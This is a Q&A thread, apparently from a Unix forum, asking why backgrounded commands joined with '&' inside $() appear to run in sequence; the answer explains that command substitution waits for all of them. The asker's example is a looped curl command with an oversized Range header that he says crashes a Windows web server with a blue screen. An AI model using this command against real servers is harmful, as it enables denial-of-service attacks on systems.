# Asynchronous background jobs in linux can interfere to each other?

Tags: linux, jobs, async

I was trying to use a linux command repeatedly and I decided to use bash scripting. The command is curl and it has blue screen given to the target web server. I was doing this as a pentester in my company. So I wanted to repeat this curl command infinite times and I was successful with bash script loop commands. The final command is in the following:

Ubuntu 14.04 LTS Terminal:

```
while :; do $(curl -v http://172.16.3.107/welcome.png -H "Range: bytes=18-18446744073709551615" & sleep 5 & pkill curl); done
```

But there is a something which I couldn't understand clearly: According to some articles and question-answers, each command in (command1 & command2 & command3 as single line) runs asynchronously and therefore they are running simultaneously without waiting one another. But in the above attacking code's result, curl's output is repeated in "every 5 seconds". That is, curl is running, then 5 seconds is waited, then curl is aborted. After that, curl is executed again. Therefore, the output is appeared again after every 5 seconds. So these commands interfere to each other. But internet articles and question-answers says its opposite. Can anyone make this point clear?

Note: By force of curl's attacking parameter, curl is pending. Not completing. Therefore, I am using sleep and then pkill command, respectively. Thereby, I can use curl command properly and repeatedly with attacking parameter.

Related Links:

1) (command1 & command2 & command3 &) Runs multiple jobs in parallel

[How to run multiple background jobs in linux?](https://unix.stackexchange.com/questions/423805/how-to-run-multiple-background-jobs-in-linux)

2) (command1 & command2 & command3 &) Runs at the same time, in separate sub-shells

https://bashitout.com/2013/05/18/Ampersands-on-the-command-line.html

3) Asynchronous (multi-Threaded) Diagram Sample

https://stackoverflow.com/questions/748175/asynchronous-vs-synchronous-execution-what-does-it-really-mean

Answer (score 0):

You can think of the execution like this:

- `curl -v ...`, `sleep 5`, `pkill curl` are *almost* simultaneously executed
- It's very possible that when `pkill curl` runs, the first `curl` command has just received some data. And then it gets killed.
- The command substitution `$( ... )` wrapping the whole thing waits until all commands end. See [Why won't function return until background process ends?](https://unix.stackexchange.com/q/218515/70524) Only then does it present all the output it has, which is whatever data `curl` had received. Run, say, `echo $(date & sleep 5); date` to verify this - you'll have to wait for the first output to appear.
- Repeat.

So you see the output of `curl` (rather, you're *executing* the output of the command substitution here, I'm not sure why) some five seconds after `curl` has been killed.

> Note: By force of curl's attacking parameter, curl is pending.

No idea what you mean by "attacking parameter".